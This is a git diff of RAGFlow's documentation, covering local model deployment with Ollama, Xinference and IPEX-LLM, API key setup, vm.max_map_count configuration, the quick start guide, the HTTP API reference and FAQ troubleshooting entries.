### 6. Update System Model Settings
|
||||
|
||||
Click on your logo **>** **Model Providers** **>** **System Model Settings** to update your model:
|
||||
|
||||
*You should now be able to find **llama3** from the dropdown list under **Chat model**.*
|
||||
|
||||
> If your local model is an embedding model, you should find your local model under **Embedding model**.
|
||||
|
||||
### 7. Update Chat Configuration
|
||||
|
||||
Update your chat model accordingly in **Chat Configuration**:
|
||||
|
||||
> If your local model is an embedding model, update it on the configruation page of your knowledge base.
|
||||
|
||||
## Deploy a local model using Xinference
|
||||
|
||||
Xorbits Inference([Xinference](https://github.com/xorbitsai/inference)) enables you to unleash the full potential of cutting-edge AI models.
|
||||
|
||||
:::note
|
||||
- For information about installing Xinference Ollama, see [here](https://inference.readthedocs.io/en/latest/getting_started/).
|
||||
- For a complete list of supported models, see the [Builtin Models](https://inference.readthedocs.io/en/latest/models/builtin/).
|
||||
:::
|
||||
|
||||
To deploy a local model, e.g., **Mistral**, using Xinference:
|
||||
|
||||
### 1. Check firewall settings
|
||||
|
||||
Ensure that your host machine's firewall allows inbound connections on port 9997.
|
||||
|
||||
### 2. Start an Xinference instance
|
||||
|
||||
To start a local instance of Xinference, run the following command:
|
||||
```bash
|
||||
$ xinference-local --host 0.0.0.0 --port 9997
|
||||
```
|
||||
### Launch Xinference
|
||||
|
||||
Decide which LLM you want to deploy ([here's a list for supported LLM](https://inference.readthedocs.io/en/latest/models/builtin/)), say, **mistral**.
|
||||
Execute the following command to launch the model, remember to replace `${quantization}` with your chosen quantization method from the options listed above:
|
||||
### 3. Launch your local model
|
||||
|
||||
Launch your local model (**Mistral**), ensuring that you replace `${quantization}` with your chosen quantization method
|
||||
:
|
||||
```bash
|
||||
$ xinference launch -u mistral --model-name mistral-v0.1 --size-in-billions 7 --model-format pytorch --quantization ${quantization}
|
||||
```
|
||||
### 4. Add Xinference
|
||||
|
||||
### Use Xinference in RAGFlow
|
||||
In RAGFlow, click on your logo on the top right of the page **>** **Model Providers** and add Xinference to RAGFlow:
|
||||
|
||||
- Go to 'Settings > Model Providers > Models to be added > Xinference'.
|
||||
|
||||

|
||||

|
||||
|
||||
> Base URL: Enter the base URL where the Xinference service is accessible, like, `http://<your-xinference-endpoint-domain>:9997/v1`.
|
||||
### 5. Complete basic Xinference settings
|
||||
|
||||
- Use Xinference Models.
|
||||
Enter an accessible base URL, such as `http://<your-xinference-endpoint-domain>:9997/v1`.
|
||||
|
||||

|
||||

|
||||
### 6. Update System Model Settings
|
||||
|
||||
Click on your logo **>** **Model Providers** **>** **System Model Settings** to update your model.
|
||||
|
||||
*You should now be able to find **mistral** from the dropdown list under **Chat model**.*
|
||||
|
||||
> If your local model is an embedding model, you should find your local model under **Embedding model**.
|
||||
|
||||
### 7. Update Chat Configuration
|
||||
|
||||
Update your chat model accordingly in **Chat Configuration**:
|
||||
|
||||
> If your local model is an embedding model, update it on the configruation page of your knowledge base.
|
||||
|
||||
## Deploy a local model using IPEX-LLM
|
||||
|
||||
IPEX-LLM([IPEX-LLM](https://github.com/intel-analytics/ipex-llm)) is a PyTorch library for running LLM on Intel CPU and GPU (e.g., local PC with iGPU, discrete GPU such as Arc, Flex and Max) with very low latency
|
||||
|
||||
To deploy a local model, eg., **Qwen2**, using IPEX-LLM, follow the steps below:
|
||||
|
||||
### 1. Check firewall settings
|
||||
|
||||
Ensure that your host machine's firewall allows inbound connections on port 11434. For example:
|
||||
|
||||
```bash
|
||||
sudo ufw allow 11434/tcp
|
||||
```
|
||||
|
||||
### 2. Install and Start Ollama serve using IPEX-LLM
|
||||
|
||||
#### 2.1 Install IPEX-LLM for Ollama
|
||||
|
||||
IPEX-LLM's support for `ollama` now is available for Linux system and Windows system.
|
||||
|
||||
Visit [Run llama.cpp with IPEX-LLM on Intel GPU Guide](https://github.com/intel-analytics/ipex-llm/blob/main/docs/mddocs/Quickstart/llama_cpp_quickstart.md), and follow the instructions in section [Prerequisites](https://github.com/intel-analytics/ipex-llm/blob/main/docs/mddocs/Quickstart/llama_cpp_quickstart.md#0-prerequisites) to setup and section [Install IPEX-LLM cpp](https://github.com/intel-analytics/ipex-llm/blob/main/docs/mddocs/Quickstart/llama_cpp_quickstart.md#1-install-ipex-llm-for-llamacpp) to install the IPEX-LLM with Ollama binaries.
|
||||
|
||||
**After the installation, you should have created a conda environment, named `llm-cpp` for instance, for running `ollama` commands with IPEX-LLM.**
|
||||
|
||||
#### 2.2 Initialize Ollama
|
||||
|
||||
Activate the `llm-cpp` conda environment and initialize Ollama by executing the commands below. A symbolic link to `ollama` will appear in your current directory.
|
||||
|
||||
- For **Linux users**:
|
||||
|
||||
```bash
|
||||
conda activate llm-cpp
|
||||
init-ollama
|
||||
```
|
||||
|
||||
- For **Windows users**:
|
||||
|
||||
Please run the following command with **administrator privilege in Miniforge Prompt**.
|
||||
|
||||
```cmd
|
||||
conda activate llm-cpp
|
||||
init-ollama.bat
|
||||
```
|
||||
|
||||
> [!NOTE]
|
||||
> If you have installed higher version `ipex-llm[cpp]` and want to upgrade your ollama binary file, don't forget to remove old binary files first and initialize again with `init-ollama` or `init-ollama.bat`.
|
||||
|
||||
**Now you can use this executable file by standard ollama's usage.**
|
||||
|
||||
#### 2.3 Run Ollama Serve
|
||||
|
||||
You may launch the Ollama service as below:
|
||||
|
||||
- For **Linux users**:
|
||||
|
||||
```bash
|
||||
export OLLAMA_NUM_GPU=999
|
||||
export no_proxy=localhost,127.0.0.1
|
||||
export ZES_ENABLE_SYSMAN=1
|
||||
source /opt/intel/oneapi/setvars.sh
|
||||
export SYCL_CACHE_PERSISTENT=1
|
||||
|
||||
./ollama serve
|
||||
```
|
||||
|
||||
- For **Windows users**:
|
||||
|
||||
Please run the following command in Miniforge Prompt.
|
||||
|
||||
```cmd
|
||||
set OLLAMA_NUM_GPU=999
|
||||
set no_proxy=localhost,127.0.0.1
|
||||
set ZES_ENABLE_SYSMAN=1
|
||||
set SYCL_CACHE_PERSISTENT=1
|
||||
|
||||
ollama serve
|
||||
```
|
||||
|
||||
|
||||
> Please set environment variable `OLLAMA_NUM_GPU` to `999` to make sure all layers of your model are running on Intel GPU, otherwise, some layers may run on CPU.
|
||||
|
||||
|
||||
> If your local LLM is running on Intel Arc™ A-Series Graphics with Linux OS (Kernel 6.2), it is recommended to additionaly set the following environment variable for optimal performance before executing `ollama serve`:
|
||||
>
|
||||
> ```bash
|
||||
> export SYCL_PI_LEVEL_ZERO_USE_IMMEDIATE_COMMANDLISTS=1
|
||||
> ```
|
||||
|
||||
|
||||
> To allow the service to accept connections from all IP addresses, use `OLLAMA_HOST=0.0.0.0 ./ollama serve` instead of just `./ollama serve`.
|
||||
|
||||
The console will display messages similar to the following:
|
||||
|
||||

|
||||
|
||||
### 3. Pull and Run Ollama Model
|
||||
|
||||
Keep the Ollama service on and open another terminal and run `./ollama pull <model_name>` in Linux (`ollama.exe pull <model_name>` in Windows) to automatically pull a model. e.g. `qwen2:latest`:
|
||||
|
||||

|
||||
|
||||
#### Run Ollama Model
|
||||
|
||||
- For **Linux users**:
|
||||
```bash
|
||||
./ollama run qwen2:latest
|
||||
```
|
||||
|
||||
- For **Windows users**:
|
||||
```cmd
|
||||
ollama run qwen2:latest
|
||||
```
|
||||
### 4. Configure RAGflow to use IPEX-LLM accelerated Ollama
|
||||
|
||||
The confiugraiton follows the steps in
|
||||
|
||||
Ollama Section 4 [Add Ollama](#4-add-ollama),
|
||||
|
||||
Section 5 [Complete basic Ollama settings](#5-complete-basic-ollama-settings),
|
||||
|
||||
Section 6 [Update System Model Settings](#6-update-system-model-settings),
|
||||
|
||||
Section 7 [Update Chat Configuration](#7-update-chat-configuration)
|
||||
|
||||
@ -3,28 +3,61 @@ sidebar_position: 4
|
||||
slug: /llm_api_key_setup
|
||||
---
|
||||
|
||||
# Set your LLM API key
|
||||
# Configure your API key
|
||||
|
||||
You have two ways to input your LLM API key.
|
||||
An API key is required for RAGFlow to interact with an online AI model. This guide provides information about setting your API key in RAGFlow.
|
||||
|
||||
## Before Starting The System
|
||||
## Get your API key
|
||||
|
||||
In **user_default_llm** of [service_conf.yaml](https://github.com/infiniflow/ragflow/blob/main/docker/service_conf.yaml), you need to specify LLM factory and your own _API_KEY_.
|
||||
RAGFlow supports the flowing LLMs, with more coming in the pipeline:
|
||||
For now, RAGFlow supports the following online LLMs. Click the corresponding link to apply for your API key. Most LLM providers grant newly-created accounts trial credit, which will expire in a couple of months, or a promotional amount of free quota.
|
||||
|
||||
- [OpenAI](https://platform.openai.com/login?launch)
|
||||
- [Tongyi-Qianwen](https://dashscope.console.aliyun.com/model),
|
||||
- [ZHIPU-AI](https://open.bigmodel.cn/),
|
||||
- [Moonshot](https://platform.moonshot.cn/docs)
|
||||
- [DeepSeek](https://platform.deepseek.com/api-docs/)
|
||||
- [Baichuan](https://www.baichuan-ai.com/home)
|
||||
- [VolcEngine](https://www.volcengine.com/docs/82379)
|
||||
- [OpenAI](https://platform.openai.com/login?launch),
|
||||
- [Tongyi-Qianwen](https://dashscope.console.aliyun.com/model),
|
||||
- [ZHIPU-AI](https://open.bigmodel.cn/),
|
||||
- [Moonshot](https://platform.moonshot.cn/docs),
|
||||
- [DeepSeek](https://platform.deepseek.com/api-docs/),
|
||||
- [Baichuan](https://www.baichuan-ai.com/home),
|
||||
- [VolcEngine](https://www.volcengine.com/docs/82379).
|
||||
|
||||
After sign in these LLM suppliers, create your own API-Key, they all have a certain amount of free quota.
|
||||
:::note
|
||||
If you find your online LLM is not on the list, don't feel disheartened. The list is expanding, and you can [file a feature request](https://github.com/infiniflow/ragflow/issues/new?assignees=&labels=feature+request&projects=&template=feature_request.yml&title=%5BFeature+Request%5D%3A+) with us! Alternatively, if you have customized or locally-deployed models, you can [bind them to RAGFlow using Ollama or Xinference](./deploy_local_llm.md).
|
||||
:::
|
||||
|
||||
## After Starting The System
|
||||
## Configure your API key
|
||||
|
||||
You can also set API-Key in **User Setting** as following:
|
||||
You have two options for configuring your API key:
|
||||
|
||||

|
||||
- Configure it in **service_conf.yaml** before starting RAGFlow.
|
||||
- Configure it on the **Model Providers** page after logging into RAGFlow.
|
||||
|
||||
### Configure API key before starting up RAGFlow
|
||||
|
||||
1. Navigate to **./docker/ragflow**.
|
||||
2. Find entry **user_default_llm**:
|
||||
- Update `factory` with your chosen LLM.
|
||||
- Update `api_key` with yours.
|
||||
- Update `base_url` if you use a proxy to connect to the remote service.
|
||||
3. Reboot your system for your changes to take effect.
|
||||
4. Log into RAGFlow.
|
||||
|
||||
*After logging into RAGFlow, you will find your chosen model appears under **Added models** on the **Model Providers** page.*
|
||||
|
||||
### Configure API key after logging into RAGFlow
|
||||
|
||||
:::caution WARNING
|
||||
After logging into RAGFlow, configuring API key through the **service_conf.yaml** file will no longer take effect.
|
||||
:::
|
||||
|
||||
After logging into RAGFlow, you can *only* configure API Key on the **Model Providers** page:
|
||||
|
||||
1. Click on your logo on the top right of the page **>** **Model Providers**.
|
||||
2. Find your model card under **Models to be added** and click **Add the model**:
|
||||

|
||||
3. Paste your API key.
|
||||
4. Fill in your base URL if you use a proxy to connect to the remote service.
|
||||
5. Click **OK** to confirm your changes.
|
||||
|
||||
:::note
|
||||
If you wish to update an existing API key at a later point:
|
||||

|
||||
:::
|
||||
@ -5,7 +5,7 @@ slug: /manage_files
|
||||
|
||||
# Manage files
|
||||
|
||||
Knowledge base, hallucination-free chat, and file management are three pillars of RAGFlow. RAGFlow's file management allows you to upload files individually or in bulk. You can then link an uploaded file to multiple target knowledge bases. This guide showcases some basic usages of the file management feature.
|
||||
Knowledge base, hallucination-free chat, and file management are the three pillars of RAGFlow. RAGFlow's file management allows you to upload files individually or in bulk. You can then link an uploaded file to multiple target knowledge bases. This guide showcases some basic usages of the file management feature.
|
||||
|
||||
## Create folder
|
||||
|
||||
@ -45,11 +45,11 @@ You can link your file to one knowledge base or multiple knowledge bases at one
|
||||
|
||||
## Move file to specified folder
|
||||
|
||||
As of RAGFlow v0.7.0, this feature is *not* available.
|
||||
As of RAGFlow v0.8.0, this feature is *not* available.
|
||||
|
||||
## Search files or folders
|
||||
|
||||
As of RAGFlow v0.7.0, the search feature is still in a rudimentary form, supporting only file and folder search in the current directory by name (files or folders in the child directory will not be retrieved).
|
||||
As of RAGFlow v0.8.0, the search feature is still in a rudimentary form, supporting only file and folder search in the current directory by name (files or folders in the child directory will not be retrieved).
|
||||
|
||||

|
||||
|
||||
@ -81,4 +81,4 @@ RAGFlow's file management allows you to download an uploaded file:
|
||||
|
||||

|
||||
|
||||
> As of RAGFlow v0.7.0, bulk download is not supported, nor can you download an entire folder.
|
||||
> As of RAGFlow v0.8.0, bulk download is not supported, nor can you download an entire folder.
|
||||
|
||||
@ -1,71 +0,0 @@
|
||||
---
|
||||
sidebar_position: 7
|
||||
slug: /max_map_count
|
||||
---
|
||||
|
||||
# Update vm.max_map_count
|
||||
|
||||
## Linux
|
||||
|
||||
To check the value of `vm.max_map_count`:
|
||||
|
||||
```bash
|
||||
$ sysctl vm.max_map_count
|
||||
```
|
||||
|
||||
Reset `vm.max_map_count` to a value at least 262144 if it is not.
|
||||
|
||||
```bash
|
||||
# In this case, we set it to 262144:
|
||||
$ sudo sysctl -w vm.max_map_count=262144
|
||||
```
|
||||
|
||||
This change will be reset after a system reboot. To ensure your change remains permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:
|
||||
|
||||
```bash
|
||||
vm.max_map_count=262144
|
||||
```
|
||||
|
||||
## Mac
|
||||
|
||||
```bash
|
||||
$ screen ~/Library/Containers/com.docker.docker/Data/vms/0/tty
|
||||
$ sysctl -w vm.max_map_count=262144
|
||||
```
|
||||
To exit the screen session, type Ctrl a d.
|
||||
|
||||
## Windows and macOS with Docker Desktop
|
||||
|
||||
The vm.max_map_count setting must be set via docker-machine:
|
||||
|
||||
```bash
|
||||
$ docker-machine ssh
|
||||
$ sudo sysctl -w vm.max_map_count=262144
|
||||
```
|
||||
|
||||
## Windows with Docker Desktop WSL 2 backend
|
||||
|
||||
To manually set it every time you reboot, you must run the following commands in a command prompt or PowerShell window every time you restart Docker:
|
||||
|
||||
```bash
|
||||
$ wsl -d docker-desktop -u root
|
||||
$ sysctl -w vm.max_map_count=262144
|
||||
```
|
||||
If you are on these versions of WSL and you do not want to have to run those commands every time you restart Docker, you can globally change every WSL distribution with this setting by modifying your %USERPROFILE%\.wslconfig as follows:
|
||||
|
||||
```bash
|
||||
[wsl2]
|
||||
kernelCommandLine = "sysctl.vm.max_map_count=262144"
|
||||
```
|
||||
This will cause all WSL2 VMs to have that setting assigned when they start.
|
||||
|
||||
If you are on Windows 11, or Windows 10 version 22H2 and have installed the Microsoft Store version of WSL, you can modify the /etc/sysctl.conf within the "docker-desktop" WSL distribution, perhaps with commands like this:
|
||||
|
||||
```bash
|
||||
$ wsl -d docker-desktop -u root
|
||||
$ vi /etc/sysctl.conf
|
||||
```
|
||||
and appending a line which reads:
|
||||
```bash
|
||||
vm.max_map_count = 262144
|
||||
```
|
||||
@ -5,7 +5,7 @@ slug: /start_chat
|
||||
|
||||
# Start an AI chat
|
||||
|
||||
Knowledge base, hallucination-free chat, and file management are three pillars of RAGFlow. Chats in RAGFlow are based on a particular knowledge base or multiple knowledge bases. Once you have created your knowledge base and finished file parsing, you can go ahead and start an AI conversation.
|
||||
Knowledge base, hallucination-free chat, and file management are the three pillars of RAGFlow. Chats in RAGFlow are based on a particular knowledge base or multiple knowledge bases. Once you have created your knowledge base and finished file parsing, you can go ahead and start an AI conversation.
|
||||
|
||||
## Start an AI chat
|
||||
|
||||
|
||||
@ -4,6 +4,8 @@ slug: /
|
||||
---
|
||||
|
||||
# Quick start
|
||||
import Tabs from '@theme/Tabs';
|
||||
import TabItem from '@theme/TabItem';
|
||||
|
||||
RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. When integrated with LLMs, it is capable of providing truthful question-answering capabilities, backed by well-founded citations from various complex formatted data.
|
||||
|
||||
@ -16,38 +18,111 @@ This quick start guide describes a general process from:
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- CPU >= 4 cores
|
||||
- RAM >= 16 GB
|
||||
- Disk >= 50 GB
|
||||
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
|
||||
- CPU ≥ 4 cores;
|
||||
- RAM ≥ 16 GB;
|
||||
- Disk ≥ 50 GB;
|
||||
- Docker ≥ 24.0.0 & Docker Compose ≥ v2.26.1.
|
||||
|
||||
> If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).
|
||||
|
||||
## Start up the server
|
||||
|
||||
This section provides instructions on setting up the RAGFlow server on Linux. If you are on a different operating system, no worries. Most steps are alike.
|
||||
This section provides instructions on setting up the RAGFlow server on Linux. If you are on a different operating system, no worries. Most steps are alike.
|
||||
|
||||
1. Ensure `vm.max_map_count` >= 262144:
|
||||
<details>
|
||||
<summary>1. Ensure <code>vm.max_map_count</code> ≥ 262144:</summary>
|
||||
|
||||
> To check the value of `vm.max_map_count`:
|
||||
>
|
||||
> ```bash
|
||||
> $ sysctl vm.max_map_count
|
||||
> ```
|
||||
>
|
||||
> Reset `vm.max_map_count` to a value at least 262144 if it is not.
|
||||
>
|
||||
> ```bash
|
||||
> # In this case, we set it to 262144:
|
||||
> $ sudo sysctl -w vm.max_map_count=262144
|
||||
> ```
|
||||
>
|
||||
> This change will be reset after a system reboot. To ensure your change remains permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:
|
||||
>
|
||||
> ```bash
|
||||
> vm.max_map_count=262144
|
||||
> ```
|
||||
> See [this guide](./guides/max_map_count.md) for instructions on permanently setting `vm.max_map_count` on an operating system other than Linux.
|
||||
`vm.max_map_count`. This value sets the maximum number of memory map areas a process may have. Its default value is 65530. While most applications require fewer than a thousand maps, reducing this value can result in abmornal behaviors, and the system will throw out-of-memory errors when a process reaches the limitation.
|
||||
|
||||
RAGFlow v0.8.0 uses Elasticsearch for multiple recall. Setting the value of `vm.max_map_count` correctly is crucial to the proper functioning of the Elasticsearch component.
|
||||
|
||||
<Tabs
|
||||
defaultValue="linux"
|
||||
values={[
|
||||
{label: 'Linux', value: 'linux'},
|
||||
{label: 'macOS', value: 'macos'},
|
||||
{label: 'Windows', value: 'windows'},
|
||||
]}>
|
||||
<TabItem value="linux">
|
||||
1.1. Check the value of `vm.max_map_count`:
|
||||
|
||||
```bash
|
||||
$ sysctl vm.max_map_count
|
||||
```
|
||||
|
||||
1.2. Reset `vm.max_map_count` to a value at least 262144 if it is not.
|
||||
|
||||
```bash
|
||||
$ sudo sysctl -w vm.max_map_count=262144
|
||||
```
|
||||
|
||||
:::caution WARNING
|
||||
This change will be reset after a system reboot. If you forget to update the value the next time you start up the server, you may get a `Can't connect to ES cluster` exception.
|
||||
:::
|
||||
|
||||
1.3. To ensure your change remains permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:
|
||||
|
||||
```bash
|
||||
vm.max_map_count=262144
|
||||
```
|
||||
</TabItem>
|
||||
<TabItem value="macos">
|
||||
If you are on macOS with Docker Desktop, then you *must* use docker-machine to update `vm.max_map_count`:
|
||||
|
||||
```bash
|
||||
$ docker-machine ssh
|
||||
$ sudo sysctl -w vm.max_map_count=262144
|
||||
```
|
||||
|
||||
:::caution WARNING
|
||||
This change will be reset after a system reboot. If you forget to update the value the next time you start up the server, you may get a `Can't connect to ES cluster` exception.
|
||||
:::
|
||||
</TabItem>
|
||||
<TabItem value="windows">
|
||||
|
||||
#### If you are on Windows with Docker Desktop, then you *must* use docker-machine to set `vm.max_map_count`:
|
||||
|
||||
```bash
|
||||
$ docker-machine ssh
|
||||
$ sudo sysctl -w vm.max_map_count=262144
|
||||
```
|
||||
#### If you are on Windows with Docker Desktop WSL 2 backend, then use docker-desktop to set `vm.max_map_count`:
|
||||
|
||||
1.1. Run the following in WSL:
|
||||
```bash
|
||||
$ wsl -d docker-desktop -u root
|
||||
$ sysctl -w vm.max_map_count=262144
|
||||
```
|
||||
|
||||
:::caution WARNING
|
||||
This change will be reset after you restart Docker. If you forget to update the value the next time you start up the server, you may get a `Can't connect to ES cluster` exception.
|
||||
:::
|
||||
|
||||
1.2. If you do not wish to have to run those commands each time you restart Docker, you can update your `%USERPROFILE%.wslconfig` as follows to keep your change permanent and globally for all WSL distributions:
|
||||
|
||||
```bash
|
||||
[wsl2]
|
||||
kernelCommandLine = "sysctl.vm.max_map_count=262144"
|
||||
```
|
||||
*This causes all WSL2 virtual machines to have that setting assigned when they start.*
|
||||
|
||||
:::note
|
||||
If you are on Windows 11 or Windows 10 version 22H2, and have installed the Microsoft Store version of WSL, you can also update the **/etc/sysctl.conf** within the docker-desktop WSL distribution to keep your change permanent:
|
||||
|
||||
```bash
|
||||
$ wsl -d docker-desktop -u root
|
||||
$ vi /etc/sysctl.conf
|
||||
```
|
||||
|
||||
```bash
|
||||
# Append a line, which reads:
|
||||
vm.max_map_count = 262144
|
||||
```
|
||||
:::
|
||||
</TabItem>
|
||||
</Tabs>
|
||||
|
||||
</details>
|
||||
|
||||
2. Clone the repo:
|
||||
|
||||
@ -57,7 +132,7 @@ This section provides instructions on setting up the RAGFlow server on Linux. If
|
||||
|
||||
3. Build the pre-built Docker images and start up the server:
|
||||
|
||||
> Running the following commands automatically downloads the *dev* version RAGFlow Docker image. To download and run a specified Docker version, update `RAGFLOW_VERSION` in **docker/.env** to the intended version, for example `RAGFLOW_VERSION=v0.7.0`, before running the following commands.
|
||||
> Running the following commands automatically downloads the *dev* version RAGFlow Docker image. To download and run a specified Docker version, update `RAGFLOW_VERSION` in **docker/.env** to the intended version, for example `RAGFLOW_VERSION=v0.8.0`, before running the following commands.
|
||||
|
||||
```bash
|
||||
$ cd ragflow/docker
|
||||
@ -93,7 +168,9 @@ This section provides instructions on setting up the RAGFlow server on Linux. If
|
||||
|
||||
5. In your web browser, enter the IP address of your server and log in to RAGFlow.
|
||||
|
||||
> - With default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
|
||||
:::caution WARNING
|
||||
With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
|
||||
:::
|
||||
|
||||
## Configure LLMs
|
||||
|
||||
@ -113,7 +190,7 @@ To add and configure an LLM:
|
||||
|
||||
1. Click on your logo on the top right of the page **>** **Model Providers**:
|
||||
|
||||

|
||||

|
||||
|
||||
> Each RAGFlow account is able to use **text-embedding-v2** for free, a embedding model of Tongyi-Qianwen. This is why you can see Tongyi-Qianwen in the **Added models** list. And you may need to update your Tongyi-Qianwen API key at a later point.
|
||||
|
||||
@ -212,3 +289,4 @@ Conversations in RAGFlow are based on a particular knowledge base or multiple kn
|
||||

|
||||
|
||||

|
||||
|
||||
@ -14,13 +14,17 @@ https://demo.ragflow.io/v1/
|
||||
|
||||
## Authorization
|
||||
|
||||
All of RAGFlow's RESTFul APIs use API key for authorization, so keep it safe and do not expose it to the front end.
|
||||
All of RAGFlow's RESTful APIs use API key for authorization, so keep it safe and do not expose it to the front end.
|
||||
Put your API key in the request header.
|
||||
|
||||
```buildoutcfg
|
||||
Authorization: Bearer {API_KEY}
|
||||
```
|
||||
|
||||
:::note
|
||||
In the current design, the RESTful API key you get from RAGFlow does not expire.
|
||||
:::
|
||||
|
||||
To get your API key:
|
||||
|
||||
1. In RAGFlow, click **Chat** tab in the middle top of the page.
|
||||
@ -109,10 +113,10 @@ This method retrieves the history of a specified conversation session.
|
||||
- `content_with_weight`: Content of the chunk.
|
||||
- `doc_name`: Name of the *hit* document.
|
||||
- `img_id`: The image ID of the chunk. It is an optional field only for PDF, PPTX, and images. Call ['GET' /document/get/\<id\>](#get-document-content) to retrieve the image.
|
||||
- positions: [page_number, [upleft corner(x, y)], [right bottom(x, y)]], the chunk position, only for PDF.
|
||||
- similarity: The hybrid similarity.
|
||||
- term_similarity: The keyword simimlarity.
|
||||
- vector_similarity: The embedding similarity.
|
||||
- `positions`: [page_number, [upleft corner(x, y)], [right bottom(x, y)]], the chunk position, only for PDF.
|
||||
- `similarity`: The hybrid similarity.
|
||||
- `term_similarity`: The keyword simimlarity.
|
||||
- `vector_similarity`: The embedding similarity.
|
||||
- `doc_aggs`:
|
||||
- `doc_id`: ID of the *hit* document. Call ['GET' /document/get/\<id\>](#get-document-content) to retrieve the document.
|
||||
- `doc_name`: Name of the *hit* document.
|
||||
@ -224,7 +228,7 @@ This method retrieves from RAGFlow the answer to the user's latest question.
|
||||
|------------------|--------|----------|---------------|
|
||||
| `conversation_id`| string | Yes | The ID of the conversation session. Call ['GET' /new_conversation](#create-conversation) to retrieve the ID.|
|
||||
| `messages` | json | Yes | The latest question in a JSON form, such as `[{"role": "user", "content": "How are you doing!"}]`|
|
||||
| `quote` | bool | No | Default: true |
|
||||
| `quote` | bool | No | Default: false|
|
||||
| `stream` | bool | No | Default: true |
|
||||
| `doc_ids` | string | No | Document IDs delimited by comma, like `c790da40ea8911ee928e0242ac180005,23dsf34ree928e0242ac180005`. The retrieved contents will be confined to these documents. |
|
||||
|
||||
|
||||
@ -194,11 +194,7 @@ Ignore this warning and continue. All system warnings can be ignored.
|
||||
|
||||

|
||||
|
||||
#### 4.3 Why does it take so long to parse a 2MB document?
|
||||
|
||||
Parsing requests have to wait in queue due to limited server resources. We are currently enhancing our algorithms and increasing computing power.
|
||||
|
||||
#### 4.4 Why does my document parsing stall at under one percent?
|
||||
#### 4.3 Why does my document parsing stall at under one percent?
|
||||
|
||||

|
||||
|
||||
@ -211,7 +207,7 @@ docker logs -f ragflow-server
|
||||
2. Check if the **task_executor.py** process exists.
|
||||
3. Check if your RAGFlow server can access hf-mirror.com or huggingface.com.
|
||||
|
||||
#### 4.5 Why does my pdf parsing stall near completion, while the log does not show any error?
|
||||
#### 4.4 Why does my pdf parsing stall near completion, while the log does not show any error?
|
||||
|
||||
If your RAGFlow is deployed *locally*, the parsing process is likely killed due to insufficient RAM. Try increasing your memory allocation by increasing the `MEM_LIMIT` value in **docker/.env**.
|
||||
|
||||
@ -225,17 +221,17 @@ If your RAGFlow is deployed *locally*, the parsing process is likely killed due
|
||||
|
||||

|
||||
|
||||
#### 4.6 `Index failure`
|
||||
#### 4.5 `Index failure`
|
||||
|
||||
An index failure usually indicates an unavailable Elasticsearch service.
|
||||
|
||||
#### 4.7 How to check the log of RAGFlow?
|
||||
#### 4.6 How to check the log of RAGFlow?
|
||||
|
||||
```bash
|
||||
tail -f path_to_ragflow/docker/ragflow-logs/rag/*.log
|
||||
```
|
||||
|
||||
#### 4.8 How to check the status of each component in RAGFlow?
|
||||
#### 4.7 How to check the status of each component in RAGFlow?
|
||||
|
||||
```bash
|
||||
$ docker ps
|
||||
@ -249,7 +245,7 @@ d8c86f06c56b mysql:5.7.18 "docker-entrypoint.s…" 7 days ago Up
|
||||
cd29bcb254bc quay.io/minio/minio:RELEASE.2023-12-20T01-00-02Z "/usr/bin/docker-ent…" 2 weeks ago Up 11 hours 0.0.0.0:9001->9001/tcp, :::9001->9001/tcp, 0.0.0.0:9000->9000/tcp, :::9000->9000/tcp ragflow-minio
|
||||
```
|
||||
|
||||
#### 4.9 `Exception: Can't connect to ES cluster`
|
||||
#### 4.8 `Exception: Can't connect to ES cluster`
|
||||
|
||||
1. Check the status of your Elasticsearch component:
|
||||
|
||||
@ -276,26 +272,26 @@ $ docker ps
|
||||
curl http://<IP_OF_ES>:<PORT_OF_ES>
|
||||
```
|
||||
|
||||
#### 4.10 Can't start ES container and get `Elasticsearch did not exit normally`
|
||||
#### 4.9 Can't start ES container and get `Elasticsearch did not exit normally`
|
||||
|
||||
This is because you forgot to update the `vm.max_map_count` value in **/etc/sysctl.conf** and your change to this value was reset after a system reboot.
|
||||
|
||||
#### 4.11 `{"data":null,"retcode":100,"retmsg":"<NotFound '404: Not Found'>"}`
|
||||
#### 4.10 `{"data":null,"retcode":100,"retmsg":"<NotFound '404: Not Found'>"}`
|
||||
|
||||
Your IP address or port number may be incorrect. If you are using the default configurations, enter `http://<IP_OF_YOUR_MACHINE>` (**NOT 9380, AND NO PORT NUMBER REQUIRED!**) in your browser. This should work.
|
||||
|
||||
#### 4.12 `Ollama - Mistral instance running at 127.0.0.1:11434 but cannot add Ollama as model in RagFlow`
|
||||
#### 4.11 `Ollama - Mistral instance running at 127.0.0.1:11434 but cannot add Ollama as model in RagFlow`
|
||||
|
||||
A correct Ollama IP address and port is crucial to adding models to Ollama:
|
||||
|
||||
- If you are on demo.ragflow.io, ensure that the server hosting Ollama has a publicly accessible IP address.Note that 127.0.0.1 is not a publicly accessible IP address.
|
||||
- If you deploy RAGFlow locally, ensure that Ollama and RAGFlow are in the same LAN and can comunicate with each other.
|
||||
|
||||
#### 4.13 Do you offer examples of using deepdoc to parse PDF or other files?
|
||||
#### 4.12 Do you offer examples of using deepdoc to parse PDF or other files?
|
||||
|
||||
Yes, we do. See the Python files under the **rag/app** folder.
|
||||
|
||||
#### 4.14 Why did I fail to upload a 10MB+ file to my locally deployed RAGFlow?
|
||||
#### 4.13 Why did I fail to upload a 10MB+ file to my locally deployed RAGFlow?
|
||||
|
||||
You probably forgot to update the **MAX_CONTENT_LENGTH** environment variable:
|
||||
|
||||
@ -314,7 +310,7 @@ docker compose up ragflow -d
|
||||
```
|
||||
*Now you should be able to upload files of sizes less than 100MB.*
|
||||
|
||||
#### 4.15 `Table 'rag_flow.document' doesn't exist`
|
||||
#### 4.14 `Table 'rag_flow.document' doesn't exist`
|
||||
|
||||
This exception occurs when starting up the RAGFlow server. Try the following:
|
||||
|
||||
@ -337,7 +333,7 @@ This exception occurs when starting up the RAGFlow server. Try the following:
